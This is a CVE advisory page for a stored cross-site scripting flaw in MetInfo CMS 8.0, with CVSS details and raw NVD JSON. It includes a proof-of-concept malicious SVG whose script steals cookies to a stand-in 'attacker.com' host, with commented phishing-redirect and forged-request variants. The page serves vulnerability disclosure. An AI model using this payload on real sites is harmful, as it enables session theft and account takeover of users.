Security Vulnerability Report
CVE-2025-60453 CVSS 6.1 MEDIUM

CVE-2025-60453

Published: 2025-10-03 14:15:47
Last Modified: 2025-10-07 15:21:35

Description

A stored Cross-Site Scripting (XSS) vulnerability has been discovered in MetInfo CMS version 8.0. The vulnerability exists in the column management module, specifically in the app\system\column\admin\index.class.php component. The vulnerability allows attackers to upload malicious SVG files containing JavaScript code that executes when the uploaded file is viewed or accessed by users.

CVSS Details

CVSS Score: 6.1
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:metinfo:metinfo:8.0.0:*:*:*:*:*:*:* - VULNERABLE
MetInfo CMS 8.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```xml
<?xml version="1.0" encoding="UTF-8"?>
<!-- Malicious SVG file for Stored XSS in MetInfo CMS 8.0 Column Module -->
<!-- CVE-2025-60453 -->
<!-- Upload this file via the column management module's file upload functionality -->
<!-- Note: the XML declaration must be the very first bytes of the file, so it precedes these comments -->
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1" width="200" height="200">
  <script type="text/javascript">
    // Malicious JavaScript payload - executed when SVG is rendered in browser
    // Example: Steal cookies and send to attacker's server
    var cookie = document.cookie;
    var img = new Image();
    img.src = "https://attacker.com/steal?cookie=" + encodeURIComponent(cookie);
    // Alternative: Redirect to phishing page
    // window.location.href = "https://attacker.com/phishing";
    // Alternative: Perform actions on behalf of the user
    // fetch('/api/sensitive-action', {method: 'POST', credentials: 'include'});
  </script>
  <rect x="0" y="0" width="200" height="200" fill="blue"/>
  <text x="50" y="100" fill="white">Icon</text>
</svg>
```

References

https://snowhy77.github.io/2025/08/22/Stored-XSS-in-MetInfo-Column-Module/ (Exploit, Third Party Advisory)

Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2025-60453",
    "sourceIdentifier": "[email protected]",
    "published": "2025-10-03T14:15:46.927",
    "lastModified": "2025-10-07T15:21:35.457",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "A stored Cross-Site Scripting (XSS) vulnerability has been discovered in MetInfo CMS version 8.0. The vulnerability exists in the column management module, specifically in the app\\system\\column\\admin\\index.class.php component. The vulnerability allows attackers to upload malicious SVG files containing JavaScript code that executes when the uploaded file is viewed or accessed by users."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
            "baseScore": 6.1,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "REQUIRED",
            "scope": "CHANGED",
            "confidentialityImpact": "LOW",
            "integrityImpact": "LOW",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 2.8,
          "impactScore": 2.7
        }
      ]
    },
    "weaknesses": [
      {
        "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
        "type": "Secondary",
        "description": [
          { "lang": "en", "value": "CWE-79" }
        ]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:metinfo:metinfo:8.0.0:*:*:*:*:*:*:*",
                "matchCriteriaId": "A86CC57E-FD95-43D3-A9CE-1153FC3C8684"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://snowhy77.github.io/2025/08/22/Stored-XSS-in-MetInfo-Column-Module/",
        "source": "[email protected]",
        "tags": ["Exploit", "Third Party Advisory"]
      }
    ]
  }
}
```